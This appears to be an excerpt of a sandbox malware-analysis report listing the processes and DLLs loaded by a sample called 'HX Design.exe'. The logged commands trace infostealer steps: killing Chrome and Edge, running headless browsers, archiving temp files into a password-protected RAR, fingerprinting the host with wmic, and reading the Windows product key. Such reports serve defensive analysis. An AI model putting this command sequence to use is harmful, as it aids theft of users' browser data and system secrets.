              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6698.tmp" "c:\Users\user\AppData\Local\Temp\33ajg45c\CSCD665F1311EED4D7D921539AB761843.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2384 --field-trial-handle=1596,i,5917360806848576916,10320061818208395364,262144 --disable-features=PaintHolding /prefetch:8
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2424 --field-trial-handle=1428,i,10138126548580973783,13072940522587371912,262144 --disable-features=PaintHolding /prefetch:3
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\HX Design.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeSection loaded: python3.dllJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeSection loaded: libffi-8.dllJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeSection loaded: sqlite3.dllJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeSection loaded: libcrypto-3.dllJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeSection loaded: libssl-3.dllJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
